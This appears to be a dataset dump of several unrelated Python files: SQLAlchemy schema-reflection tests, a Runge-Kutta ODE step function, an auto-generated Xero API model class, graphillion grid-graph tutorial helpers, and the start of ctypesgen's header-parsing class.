m5 = MetaData(testing.db)
m5.reflect(only=[])
self.assert_(not m5.tables)
m6 = MetaData(testing.db)
m6.reflect(only=lambda n, m: False)
self.assert_(not m6.tables)
m7 = MetaData(testing.db)
m7.reflect()
self.assert_(nameset.issubset(set(m7.tables.keys())))
m8 = MetaData()
assert_raises(sa.exc.UnboundExecutionError, m8.reflect)
m8_e1 = MetaData(testing.db)
rt_c = Table("rt_c", m8_e1)
m8_e1.reflect(extend_existing=True)
eq_(set(m8_e1.tables.keys()), set(names))
eq_(rt_c.c.keys(), ["id"])
m8_e2 = MetaData(testing.db)
rt_c = Table("rt_c", m8_e2)
m8_e2.reflect(extend_existing=True, only=["rt_a", "rt_c"])
eq_(set(m8_e2.tables.keys()), set(["rt_a", "rt_c"]))
eq_(rt_c.c.keys(), ["id"])
if existing:
print("Other tables present in database, skipping some checks.")
else:
baseline.drop_all()
m9 = MetaData(testing.db)
m9.reflect()
self.assert_(not m9.tables)
@testing.provide_metadata
def test_reflect_all_unreflectable_table(self):
names = ["rt_%s" % name for name in ("a", "b", "c", "d", "e")]
for name in names:
Table(
name, self.metadata, Column("id", sa.Integer, primary_key=True)
)
self.metadata.create_all()
m = MetaData()
reflecttable = testing.db.dialect.reflecttable
def patched(conn, table, *arg, **kw):
if table.name == "rt_c":
raise sa.exc.UnreflectableTableError("Can't reflect rt_c")
else:
return reflecttable(conn, table, *arg, **kw)
with mock.patch.object(testing.db.dialect, "reflecttable", patched):
with expect_warnings("Skipping table rt_c: Can't reflect rt_c"):
m.reflect(bind=testing.db)
assert_raises_message(
sa.exc.UnreflectableTableError,
"Can't reflect rt_c",
Table,
"rt_c",
m,
autoload_with=testing.db,
)
def test_reflect_all_conn_closing(self):
m1 = MetaData()
c = testing.db.connect()
m1.reflect(bind=c)
assert not c.closed
def test_inspector_conn_closing(self):
c = testing.db.connect()
inspect(c)
assert not c.closed
@testing.provide_metadata
def test_index_reflection(self):
m1 = self.metadata
t1 = Table(
"party",
m1,
Column("id", sa.Integer, nullable=False),
Column("name", sa.String(20), index=True),
)
sa.Index("idx1", t1.c.id, unique=True)
sa.Index("idx2", t1.c.name, t1.c.id, unique=False)
m1.create_all()
m2 = MetaData(testing.db)
t2 = Table("party", m2, autoload=True)
assert len(t2.indexes) == 3
        # Make sure indexes come back in the order we expect
tmp = [(idx.name, idx) for idx in t2.indexes]
tmp.sort()
r1, r2, r3 = [idx[1] for idx in tmp]
assert r1.name == "idx1"
assert r2.name == "idx2"
assert r1.unique == True # noqa
assert r2.unique == False # noqa
assert r3.unique == False # noqa
assert set([t2.c.id]) == set(r1.columns)
assert set([t2.c.name, t2.c.id]) == set(r2.columns)
assert set([t2.c.name]) == set(r3.columns)
@testing.requires.comment_reflection
@testing.provide_metadata
def test_comment_reflection(self):
m1 = self.metadata
Table(
"sometable",
m1,
Column("id", sa.Integer, comment="c1 comment"),
comment="t1 comment",
)
m1.create_all()
m2 = MetaData(testing.db)
t2 = Table("sometable", m2, autoload=True)
eq_(t2.comment, "t1 comment")
eq_(t2.c.id.comment, "c1 comment")
t3 = Table("sometable", m2, extend_existing=True)
eq_(t3.comment, "t1 comment")
eq_(t3.c.id.comment, "c1 comment")
@testing.requires.check_constraint_reflection
@testing.provide_metadata
def test_check_constraint_reflection(self):
m1 = self.metadata
Table(
"x",
m1,
Column("q", Integer),
sa.CheckConstraint("q > 10", name="ck1"),
)
m1.create_all()
m2 = MetaData(testing.db)
t2 = Table("x", m2, autoload=True)
ck = [
const
for const in t2.constraints
if isinstance(const, sa.CheckConstraint)
][0]
eq_regex(ck.sqltext.text, r"[\(`]*q[\)`]* > 10")
eq_(ck.name, "ck1")
@testing.provide_metadata
def test_index_reflection_cols_busted(self):
t = Table(
"x", self.metadata, Column("a", Integer), Column("b", Integer)
)
sa.Index("x_ix", t.c.a, t.c.b)
self.metadata.create_all()
def mock_get_columns(self, connection, table_name, **kw):
return [{"name": "b", "type": Integer, "primary_key": False}]
with testing.mock.patch.object(
testing.db.dialect, "get_columns", mock_get_columns
):
m = MetaData()
with testing.expect_warnings(
"index key 'a' was not located in columns"
):
t = Table("x", m, autoload=True, autoload_with=testing.db)
eq_(list(t.indexes)[0].columns, [t.c.b])
@testing.requires.views
@testing.provide_metadata
def test_views(self):
metadata = self.metadata
users, addresses, dingalings = createTables(metadata)
try:
metadata.create_all()
_create_views(metadata.bind, None)
m2 = MetaData(testing.db)
users_v = Table("users_v", m2, autoload=True)
addresses_v = Table("email_addresses_v", m2, autoload=True)
for c1, c2 in zip(users_v.c, users.c):
eq_(c1.name, c2.name)
self.assert_types_base(c1, c2)
for c1, c2 in zip(addresses_v.c, addresses.c):
eq_(c1.name, c2.name)
self.assert_types_base(c1, c2)
finally:
_drop_views(metadata.bind)
@testing.requires.views
@testing.provide_metadata
def test_reflect_all_with_views(self):
metadata = self.metadata
users, addresses, dingalings = createTables(metadata, None)
try:
metadata.create_all()
_create_views(metadata.bind, None)
m2 = MetaData(testing.db)
m2.reflect(views=False)
eq_(
set(m2.tables), set(["users", "email_addresses", "dingalings"])
)
m2 = MetaData(testing.db)
m2.reflect(views=True)
eq_(
set(m2.tables),
set(
[
"email_addresses_v",
"users_v",
"users",
"dingalings",
"email_addresses",
]
),
)
finally:
_drop_views(metadata.bind)
class CreateDropTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, users
metadata = MetaData()
users = Table(
"users",
metadata,
Column(
"user_id",
sa.Integer,
sa.Sequence("user_id_seq", optional=True),
primary_key=True,
),
Column("user_name", sa.String(40)),
)
Table(
"email_addresses",
metadata,
Column(
"address_id",
sa.Integer,
sa.Sequence("address_id_seq", optional=True),
primary_key=True,
),
Column("user_id", sa.Integer, sa.ForeignKey(users.c.user_id)),
Column("email_address", sa.String(40)),
)
Table(
"orders",
metadata,
Column(
"order_id",
sa.Integer,
sa.Sequence("order_id_seq", optional=True),
primary_key=True,
),
Column("user_id", sa.Integer, sa.ForeignKey(users.c.user_id)),
Column("description", sa.String(50)),
Column("isopen", sa.Integer),
)
Table(
"items",
metadata,
Column(
"item_id",
sa.INT,
sa.Sequence("items_id_seq", optional=True),
primary_key=True,
),
Column("order_id", sa.INT, sa.ForeignKey("orders")),
Column("item_name", sa.VARCHAR(50)),
)
def test_sorter(self):
tables = metadata.sorted_tables
table_names = [t.name for t in tables]
ua = [n for n in table_names if n in ("users", "email_addresses")]
oi = [n for n in table_names if n in ("orders", "items")]
eq_(ua, ["users", "email_addresses"])
eq_(oi, ["orders", "items"])
def test_checkfirst(self):
try:
assert not users.exists(testing.db)
users.create(bind=testing.db)
assert users.exists(testing.db)
users.create(bind=testing.db, checkfirst=True)
users.drop(bind=testing.db)
users.drop(bind=testing.db, checkfirst=True)
assert not users.exists(bind=testing.db)
users.create(bind=testing.db, checkfirst=True)
users.drop(bind=testing.db)
finally:
metadata.drop_all(bind=testing.db)
def test_createdrop(self):
metadata.create_all(bind=testing.db)
eq_(testing.db.has_table("items"), True)
eq_(testing.db.has_table("email_addresses"), True)
metadata.create_all(bind=testing.db)
eq_(testing.db.has_table("items"), True)
metadata.drop_all(bind=testing.db)
eq_(testing.db.has_table("items"), False)
eq_(testing.db.has_table("email_addresses"), False)
metadata.drop_all(bind=testing.db)
eq_(testing.db.has_table("items"), False)
def test_tablenames(self):
metadata.create_all(bind=testing.db)
# we only check to see if all the explicitly created tables are
# there, rather than assertEqual -- the test db could have
# "extra" tables if there is a misconfigured template. (*cough*
# tsearch2 w/ the pg windows installer.)
self.assert_(not set(metadata.tables) - set(testing.db.table_names()))
metadata.drop_all(bind=testing.db)
class SchemaManipulationTest(fixtures.TestBase):
__backend__ = True
def test_append_constraint_unique(self):
meta = MetaData()
users = Table("users", meta, Column("id", sa.Integer))
addresses = Table(
"addresses",
meta,
Column("id", sa.Integer),
Column("user_id", sa.Integer),
)
fk = sa.ForeignKeyConstraint(["user_id"], [users.c.id])
addresses.append_constraint(fk)
addresses.append_constraint(fk)
assert len(addresses.c.user_id.foreign_keys) == 1
assert addresses.constraints == set([addresses.primary_key, fk])
class UnicodeReflectionTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
cls.metadata = metadata = MetaData()
no_multibyte_period = set([("plain", "col_plain", "ix_plain")])
no_has_table = [
(
"no_has_table_1",
ue("col_Unit\u00e9ble"),
ue("ix_Unit\u00e9ble"),
),
("no_has_table_2", ue("col_\u6e2c\u8a66"), ue("ix_\u6e2c\u8a66")),
]
no_case_sensitivity = [
(
ue("\u6e2c\u8a66"),
ue("col_\u6e2c\u8a66"),
ue("ix_\u6e2c\u8a66"),
),
(
ue("unit\u00e9ble"),
ue("col_unit\u00e9ble"),
ue("ix_unit\u00e9ble"),
),
]
full = [
(
ue("Unit\u00e9ble"),
ue("col_Unit\u00e9ble"),
ue("ix_Unit\u00e9ble"),
),
(
ue("\u6e2c\u8a66"),
ue("col_\u6e2c\u8a66"),
ue("ix_\u6e2c\u8a66"),
),
]
# as you can see, our options for this kind of thing
        # are really limited unless you're on PG or SQLite;
        # forget about it on the other backends
if not testing.requires.unicode_ddl.enabled:
names = no_multibyte_period
# mysql can't handle casing usually
elif (
testing.against("mysql")
and not testing.requires.mysql_fully_case_sensitive.enabled
):
names = no_multibyte_period.union(no_case_sensitivity)
# mssql + pyodbc + freetds can't compare multibyte names to
# information_schema.tables.table_name
elif testing.against("mssql"):
names = no_multibyte_period.union(no_has_table)
else:
names = no_multibyte_period.union(full)
for tname, cname, ixname in names:
t = Table(
tname,
metadata,
Column(
"id",
sa.Integer,
sa.Sequence(cname + "_id_seq"),
primary_key=True,
),
Column(cname, Integer),
)
schema.Index(ixname, t.c[cname])
metadata.create_all(testing.db)
cls.names = names
@classmethod
def teardown_class(cls):
cls.metadata.drop_all(testing.db, checkfirst=False)
@testing.requires.unicode_connections
def test_has_table(self):
for tname, cname, ixname in self.names:
assert testing.db.has_table(tname), "Can't detect name %s" % tname
@testing.requires.unicode_connections
def test_basic(self):
        # the 'convert_unicode' setting should not get in the way of the
        # reflection process. reflecttable for Oracle, PostgreSQL
        # (others?) expects non-unicode strings in result sets/bind
        # params
bind = testing.db
names = set([rec[0] for rec in self.names])
reflected = set(bind.table_names())
# Jython 2.5 on Java 5 lacks unicodedata.normalize
if not names.issubset(reflected) and hasattr(unicodedata, "normalize"):
# Python source files in the utf-8 coding seem to
# normalize literals as NFC (and the above are
# explicitly NFC). Maybe this database normalizes NFD
# on reflection.
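            # e.g. u"\u00e9" is NFC, while its NFD form is u"e\u0301"
            # (e + combining acute); normalize("NFC", u"e\u0301") folds it
            # back to u"\u00e9".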
nfc = set([unicodedata.normalize("NFC", n) for n in names])
self.assert_(nfc == names)
# Yep. But still ensure that bulk reflection and
# create/drop work with either normalization.
r = MetaData(bind)
r.reflect()
r.drop_all(checkfirst=False)
r.create_all(checkfirst=False)
@testing.requires.unicode_connections
def test_get_names(self):
inspector = inspect(testing.db)
names = dict(
(tname, (cname, ixname)) for tname, cname, ixname in self.names
)
for tname in inspector.get_table_names():
assert tname in names
eq_(
[
(rec["name"], rec["column_names"][0])
for rec in inspector.get_indexes(tname)
],
[(names[tname][1], names[tname][0])],
)
class SchemaTest(fixtures.TestBase):
__backend__ = True
@testing.requires.schemas
@testing.requires.cross_schema_fk_reflection
def test_has_schema(self):
if not hasattr(testing.db.dialect, "has_schema"):
testing.config.skip_test(
"dialect %s doesn't have a has_schema method"
% testing.db.dialect.name
)
eq_(
testing.db.dialect.has_schema(
testing.db, testing.config.test_schema
),
True,
)
eq_(
testing.db.dialect.has_schema(testing.db, "sa_fake_schema_123"),
False,
)
@testing.requires.schemas
@testing.requires.cross_schema_fk_reflection
@testing.requires.implicit_default_schema
@testing.provide_metadata
def test_blank_schema_arg(self):
metadata = self.metadata
Table(
"some_table",
metadata,
Column("id", Integer, primary_key=True),
Column("sid", Integer, sa.ForeignKey("some_other_table.id")),
schema=testing.config.test_schema,
test_needs_fk=True,
)
Table(
"some_other_table",
metadata,
Column("id", Integer, primary_key=True),
schema=None,
test_needs_fk=True,
)
metadata.create_all()
with testing.db.connect() as conn:
meta2 = MetaData(conn, schema=testing.config.test_schema)
meta2.reflect()
eq_(
set(meta2.tables),
set(
[
"some_other_table",
"%s.some_table" % testing.config.test_schema,
]
),
)
@testing.requires.schemas
@testing.fails_on("sqlite", "FIXME: unknown")
@testing.fails_on("sybase", "FIXME: unknown")
def test_explicit_default_schema(self):
engine = testing.db
engine.connect().close()
if testing.against("sqlite"):
# Works for CREATE TABLE main.foo, SELECT FROM main.foo, etc.,
# but fails on:
# FOREIGN KEY(col2) REFERENCES main.table1 (col1)
schema = "main"
else:
schema = engine.dialect.default_schema_name
assert bool(schema)
metadata = MetaData(engine)
Table(
"table1",
metadata,
Column("col1", sa.Integer, primary_key=True),
test_needs_fk=True,
schema=schema,
)
Table(
"table2",
metadata,
Column("col1", sa.Integer, primary_key=True),
Column(
"col2", sa.Integer, sa.ForeignKey("%s.table1.col1" % schema)
),
test_needs_fk=True,
schema=schema,
)
try:
metadata.create_all()
metadata.create_all(checkfirst=True)
assert len(metadata.tables) == 2
metadata.clear()
Table("table1", metadata, autoload=True, schema=schema)
Table("table2", metadata, autoload=True, schema=schema)
assert len(metadata.tables) == 2
finally:
metadata.drop_all()
@testing.requires.schemas
@testing.provide_metadata
def test_schema_translation(self):
Table(
"foob",
self.metadata,
Column("q", Integer),
schema=config.test_schema,
)
self.metadata.create_all()
m = MetaData()
map_ = {"foob": config.test_schema}
with config.db.connect().execution_options(
schema_translate_map=map_
) as conn:
t = Table("foob", m, schema="foob", autoload_with=conn)
eq_(t.schema, "foob")
eq_(t.c.keys(), ["q"])
@testing.requires.schemas
@testing.fails_on("sybase", "FIXME: unknown")
def test_explicit_default_schema_metadata(self):
engine = testing.db
if testing.against("sqlite"):
# Works for CREATE TABLE main.foo, SELECT FROM main.foo, etc.,
# but fails on:
# FOREIGN KEY(col2) REFERENCES main.table1 (col1)
schema = "main"
else:
schema = engine.dialect.default_schema_name
assert bool(schema)
metadata = MetaData(engine, schema=schema)
Table(
"table1",
metadata,
Column("col1", sa.Integer, primary_key=True),
test_needs_fk=True,
)
Table(
"table2",
metadata,
Column("col1", sa.Integer, primary_key=True),
Column("col2", sa.Integer, sa.ForeignKey("table1.col1")),
test_needs_fk=True,
)
try:
metadata.create_all()
metadata.create_all(checkfirst=True)
assert len(metadata.tables) == 2
metadata.clear()
Table("table1", metadata, autoload=True)
Table("table2", metadata, autoload=True)
assert len(metadata.tables) == 2
finally:
metadata.drop_all()
@testing.requires.schemas
@testing.provide_metadata
def test_metadata_reflect_schema(self):
metadata = self.metadata
createTables(metadata, testing.config.test_schema)
metadata.create_all()
m2 = MetaData(schema=testing.config.test_schema, bind=testing.db)
m2.reflect()
eq_(
set(m2.tables),
set(
[
"%s.dingalings" % testing.config.test_schema,
"%s.users" % testing.config.test_schema,
"%s.email_addresses" % testing.config.test_schema,
]
),
)
@testing.requires.schemas
@testing.requires.cross_schema_fk_reflection
@testing.requires.implicit_default_schema
@testing.provide_metadata
def test_reflect_all_schemas_default_overlap(self):
t1 = Table("t", self.metadata, Column("id", Integer, primary_key=True))
t2 = Table(
"t",
self.metadata,
Column("id1", sa.ForeignKey("t.id")),
schema=testing.config.test_schema,
)
self.metadata.create_all()
m2 = MetaData()
m2.reflect(testing.db, schema=testing.config.test_schema)
m3 = MetaData()
m3.reflect(testing.db)
m3.reflect(testing.db, schema=testing.config.test_schema)
eq_(
set((t.name, t.schema) for t in m2.tables.values()),
set((t.name, t.schema) for t in m3.tables.values()),
)
# Tests related to engine.reflection
def createTables(meta, schema=None):
if schema:
schema_prefix = schema + "."
else:
schema_prefix = ""
users = Table(
"users",
meta,
Column("user_id", sa.INT, primary_key=True),
Column("user_name", sa.VARCHAR(20), nullable=False),
Column("test1", sa.CHAR(5), nullable=False),
Column("test2", sa.Float(5), nullable=False),
Column("test3", sa.Text),
Column("test4", sa.Numeric(10, 2), nullable=False),
Column("test5", sa.Date),
Column(
"parent_user_id",
sa.Integer,
sa.ForeignKey("%susers.user_id" % schema_prefix),
),
Column("test6", sa.Date, nullable=False),
Column("test7", sa.Text),
Column("test8", sa.LargeBinary),
Column("test_passivedefault2", sa.Integer, server_default="5"),
Column("test9", sa.LargeBinary(100)),
Column("test10", sa.Numeric(10, 2)),
schema=schema,
test_needs_fk=True,
)
dingalings = Table(
"dingalings",
meta,
Column("dingaling_id", sa.Integer, primary_key=True),
Column(
"address_id",
sa.Integer,
sa.ForeignKey("%semail_addresses.address_id" % schema_prefix),
),
Column("data", sa.String(30)),
schema=schema,
test_needs_fk=True,
)
addresses = Table(
"email_addresses",
meta,
Column("address_id", sa.Integer),
Column("remote_user_id", sa.Integer, sa.ForeignKey(users.c.user_id)),
Column("email_address", sa.String(20)),
sa.PrimaryKeyConstraint("address_id", name="email_ad_pk"),
schema=schema,
test_needs_fk=True,
)
return (users, addresses, dingalings)
def createIndexes(con, schema=None):
fullname = "users"
if schema:
fullname = "%s.%s" % (schema, "users")
query = "CREATE INDEX users_t_idx ON %s (test1, test2)" % fullname
con.execute(sa.sql.text(query))
@testing.requires.views
def _create_views(con, schema=None):
for table_name in ("users", "email_addresses"):
fullname = table_name
if schema:
fullname = "%s.%s" % (schema, table_name)
view_name = fullname + "_v"
query = "CREATE VIEW %s AS SELECT * FROM %s" % (view_name, fullname)
con.execute(sa.sql.text(query))
@testing.requires.views
def _drop_views(con, schema=None):
for table_name in ("email_addresses", "users"):
fullname = table_name
if schema:
fullname = "%s.%s" % (schema, table_name)
view_name = fullname + "_v"
query = "DROP VIEW %s" % view_name
con.execute(sa.sql.text(query))
class ReverseCasingReflectTest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = "default"
__backend__ = True
@testing.requires.denormalized_names
def setup(self):
testing.db.execute(
"""
CREATE TABLE weird_casing(
col1 char(20),
"Col2" char(20),
"col3" char(20)
)
"""
)
@testing.requires.denormalized_names
def teardown(self):
testing.db.execute("drop table weird_casing")
@testing.requires.denormalized_names
def test_direct_quoting(self):
m = MetaData(testing.db)
t = Table("weird_casing", m, autoload=True)
self.assert_compile(
t.select(),
"SELECT weird_casing.col1, "
'weird_casing."Col2", weird_casing."col3" '
"FROM weird_casing",
)
class CaseSensitiveTest(fixtures.TablesTest):
"""Nail down case sensitive behaviors, mostly on MySQL."""
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"SomeTable",
metadata,
Column("x", Integer, primary_key=True),
test_needs_fk=True,
)
Table(
"SomeOtherTable",
metadata,
Column("x", Integer, primary_key=True),
Column("y", Integer, sa.ForeignKey("SomeTable.x")),
test_needs_fk=True,
)
@testing.fails_if(testing.requires._has_mysql_on_windows)
def test_table_names(self):
x = testing.db.run_callable(testing.db.dialect.get_table_names)
assert set(["SomeTable", "SomeOtherTable"]).issubset(x)
def test_reflect_exact_name(self):
m = MetaData()
t1 = Table("SomeTable", m, autoload=True, autoload_with=testing.db)
eq_(t1.name, "SomeTable")
assert t1.c.x is not None
@testing.fails_if(
lambda: testing.against(("mysql", "<", (5, 5)))
and not testing.requires._has_mysql_fully_case_sensitive()
)
def test_reflect_via_fk(self):
m = MetaData()
t2 = Table(
"SomeOtherTable", m, autoload=True, autoload_with=testing.db
)
eq_(t2.name, "SomeOtherTable")
assert "SomeTable" in m.tables
@testing.fails_if(testing.requires._has_mysql_fully_case_sensitive)
@testing.fails_on_everything_except("sqlite", "mysql", "mssql")
def test_reflect_case_insensitive(self):
m = MetaData()
t2 = Table("sOmEtAbLe", m, autoload=True, autoload_with=testing.db)
eq_(t2.name, "sOmEtAbLe")
class ColumnEventsTest(fixtures.RemovesEvents, fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
cls.metadata = MetaData()
cls.to_reflect = Table(
"to_reflect",
cls.metadata,
Column("x", sa.Integer, primary_key=True),
Column("y", sa.Integer),
test_needs_fk=True,
)
cls.related = Table(
"related",
cls.metadata,
Column("q", sa.Integer, sa.ForeignKey("to_reflect.x")),
test_needs_fk=True,
)
sa.Index("some_index", cls.to_reflect.c.y)
cls.metadata.create_all(testing.db)
@classmethod
def teardown_class(cls):
cls.metadata.drop_all(testing.db)
def _do_test(self, col, update, assert_, tablename="to_reflect"):
# load the actual Table class, not the test
# wrapper
from sqlalchemy.schema import Table
m = MetaData(testing.db)
def column_reflect(insp, table, column_info):
if column_info["name"] == col:
column_info.update(update)
t = Table(
tablename,
m,
autoload=True,
listeners=[("column_reflect", column_reflect)],
)
assert_(t)
m = MetaData(testing.db)
self.event_listen(Table, "column_reflect", column_reflect)
t2 = Table(tablename, m, autoload=True)
assert_(t2)
def test_override_key(self):
def assertions(table):
eq_(table.c.YXZ.name, "x")
eq_(set(table.primary_key), set([table.c.YXZ]))
self._do_test("x", {"key": "YXZ"}, assertions)
def test_override_index(self):
def assertions(table):
idx = list(table.indexes)[0]
eq_(idx.columns, [table.c.YXZ])
self._do_test("y", {"key": "YXZ"}, assertions)
def test_override_key_fk(self):
m = MetaData(testing.db)
def column_reflect(insp, table, column_info):
if column_info["name"] == "q":
column_info["key"] = "qyz"
elif column_info["name"] == "x":
column_info["key"] = "xyz"
to_reflect = Table(
"to_reflect",
m,
autoload=True,
listeners=[("column_reflect", column_reflect)],
)
related = Table(
"related",
m,
autoload=True,
listeners=[("column_reflect", column_reflect)],
)
assert related.c.qyz.references(to_reflect.c.xyz)
def test_override_type(self):
def assert_(table):
assert isinstance(table.c.x.type, sa.String)
self._do_test("x", {"type": sa.String}, assert_)
def test_override_info(self):
self._do_test(
"x",
{"info": {"a": "b"}},
lambda table: eq_(table.c.x.info, {"a": "b"}),
)
def test_override_server_default_fetchedvalue(self):
my_default = FetchedValue()
self._do_test(
"x",
{"default": my_default},
lambda table: eq_(table.c.x.server_default, my_default),
)
def test_override_server_default_default_clause(self):
my_default = DefaultClause("1")
self._do_test(
"x",
{"default": my_default},
lambda table: eq_(table.c.x.server_default, my_default),
)
def test_override_server_default_plain_text(self):
my_default = "1"
def assert_text_of_one(table):
is_true(
isinstance(
table.c.x.server_default.arg, sql.elements.TextClause
)
)
eq_(str(table.c.x.server_default.arg), "1")
self._do_test("x", {"default": my_default}, assert_text_of_one)
def test_override_server_default_textclause(self):
my_default = sa.text("1")
def assert_text_of_one(table):
is_true(
isinstance(
table.c.x.server_default.arg, sql.elements.TextClause
)
)
eq_(str(table.c.x.server_default.arg), "1")
self._do_test("x", {"default": my_default}, assert_text_of_one)
|
py | b414e1939d5543f2c1d3da17d9ff1f5ced06ae04 | # this is the second order two stage method
# it is your choice as to what the parameter alpha is
# refer to https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
# numpy for mathematical operations and working with states
import numpy as np
def gen_2(func, y_n, t_step, t_n, alpha = .5):
# this is a single-step generalized 2-stage, 2nd-order solver
# defaults to the midpoint method (alpha = 0.5); other values of alpha give other
# 2nd-order schemes (e.g. alpha = 1 is Heun's method, alpha = 2/3 is Ralston's)
# rename some stuff
a = alpha
h = t_step
# determine the stage components
k1 = func(t_n, y_n)
k2 = func(t_n + a*h, y_n + a*h*k1)
# perform the step
y_np1 = y_n + h*((1-(1/(2*a)))*k1 + (1/(2*a))*k2)
# return the next step
return y_np1
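# Illustrative usage sketch (added for clarity, not part of the original module):
# integrate dy/dt = -y from t = 0 to t = 1 with the midpoint method (alpha = 0.5);
# for a small step size the result should be close to exp(-1).
def _demo_gen_2(t_step=0.001):
    f = lambda t, y: -y
    y, t = 1.0, 0.0
    while t < 1.0 - 1e-12:
        y = gen_2(f, y, t_step, t)
        t += t_step
    return y, np.exp(-1.0)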
def gen_2_mul(func, y_n, t_step, t_span, alpha = .5):
# this is a multi-step generalized 2-stage, 2nd-order solver
# defaults to the midpoint method (alpha = 0.5); see gen_2 for other choices of alpha
# rename things
a = alpha
h = t_step
# create the set of times at which a step is taken (t_span[0] up to, but not including, t_span[1])
t_set = np.arange(t_span[0], t_span[1], t_step)
# iterate through the time set
for t in t_set:
y_n = gen_2(func, y_n, t_step, t, alpha)
# return the new state
return y_n |
py | b414e2235d56353a80b8c7825a338a4a35d00831 | # coding: utf-8
"""
Accounting API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 2.3.4
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class OnlineInvoices(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"online_invoices": "list[OnlineInvoice]"}
attribute_map = {"online_invoices": "OnlineInvoices"}
def __init__(self, online_invoices=None): # noqa: E501
"""OnlineInvoices - a model defined in OpenAPI""" # noqa: E501
self._online_invoices = None
self.discriminator = None
if online_invoices is not None:
self.online_invoices = online_invoices
@property
def online_invoices(self):
"""Gets the online_invoices of this OnlineInvoices. # noqa: E501
:return: The online_invoices of this OnlineInvoices. # noqa: E501
:rtype: list[OnlineInvoice]
"""
return self._online_invoices
@online_invoices.setter
def online_invoices(self, online_invoices):
"""Sets the online_invoices of this OnlineInvoices.
:param online_invoices: The online_invoices of this OnlineInvoices. # noqa: E501
:type: list[OnlineInvoice]
"""
self._online_invoices = online_invoices
|
py | b414e24d11368b131631819e17f5072f2b2b35a9 | # Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Helper functions for tutorial.
"""
from builtins import range
from graphillion import GraphSet
from random import seed, shuffle
def grid(m, n=None, prob_to_remove_edge=0.0):
import networkx as nx
# critical edge probability is 0.5 in the percolation theory
assert 0 <= prob_to_remove_edge < 0.4
seed(1)
m += 1
if n is None:
n = m
else:
n += 1
edges = []
for v in range(1, m * n + 1):
if v % n != 0:
edges.append((v, v + 1))
if v <= (m - 1) * n:
edges.append((v, v + n))
g = nx.Graph(edges)
while prob_to_remove_edge > 0:
g = nx.Graph(edges)
edges_removed = edges[:]
shuffle(edges_removed)
g.remove_edges_from(edges_removed[:int(len(edges)*prob_to_remove_edge)])
if nx.is_connected(g) and len(g[1]) == 2:
break
return g.edges()
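# Illustrative sketch (added for clarity, not part of the original helpers):
# grid(2) builds a 3x3-vertex grid graph (vertices 1..9, row-major) with 12 edges.
def _demo_grid():
    return len(list(grid(2)))  # expected: 12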
def draw(g, universe=None):
import networkx as nx
import matplotlib.pyplot as plt
if not isinstance(g, nx.Graph):
g = nx.Graph(list(g))
if universe is None:
universe = GraphSet.universe()
if not isinstance(universe, nx.Graph):
universe = nx.Graph(list(universe))
n = sorted(universe[1].keys())[1] - 1
m = universe.number_of_nodes() // n
g.add_nodes_from(universe.nodes())
pos = {}
for v in range(1, m * n + 1):
pos[v] = ((v - 1) % n, (m * n - v) // n)
nx.draw(g, pos)
plt.show()
def how_many_turns(path):
path = set(path)
turns = 0
pos = 1
direction = 1
while (True):
edges = [e for e in path if e[0] == pos or e[1] == pos]
if not edges: break
edge = edges[0]
path -= set([edge])
next_direction = abs(edge[1] - edge[0])
if direction != next_direction:
turns +=1
pos = edge[1] if edge[0] == pos else edge[0]
direction = next_direction
return turns
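# Illustrative note (added for clarity, not part of the original helpers): with a
# 3-column grid numbering, how_many_turns([(1, 2), (2, 5)]) == 1 because the path
# first moves horizontally (vertex difference 1) and then vertically (difference 3).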
def hist(data):
import matplotlib.pyplot as plt
plt.hist(data)
plt.show()
|
py | b414e2c3289c262be8bde2994e406ec8ce1315c9 | #!/usr/bin/env python
"""
DataCollectingParser subclasses ctypesparser.CtypesParser and builds Description
objects from the CtypesType objects and other information from CtypesParser.
After parsing is complete, a DescriptionCollection object can be retrieved by
calling DataCollectingParser.data().
"""
import os
from tempfile import mkstemp
from ctypesgen.ctypedescs import CtypesEnum, CtypesType, CtypesTypeVisitor
from ctypesgen.descriptions import (
ConstantDescription,
DescriptionCollection,
EnumDescription,
FunctionDescription,
MacroDescription,
StructDescription,
TypedefDescription,
UndefDescription,
VariableDescription,
)
from ctypesgen.expressions import ConstantExpressionNode
from ctypesgen.messages import error_message, status_message
from ctypesgen.parser import ctypesparser
class DataCollectingParser(ctypesparser.CtypesParser, CtypesTypeVisitor):
"""Main class for the Parser component. Steps for use:
p=DataCollectingParser(names_of_header_files,options)
p.parse()
data=p.data() #A dictionary of constants, enums, structs, functions, etc.
"""
def __init__(self, headers, options):
super(DataCollectingParser, self).__init__(options)
self.headers = headers
self.options = options
self.constants = []
self.typedefs = []
self.structs = []
self.enums = []
self.functions = []
self.variables = []
self.macros = []
self.all = []
self.output_order = []
# NULL is a useful macro to have defined
null = ConstantExpressionNode(None)
nullmacro = ConstantDescription("NULL", null, ("<built-in>", 1))
self.constants.append(nullmacro)
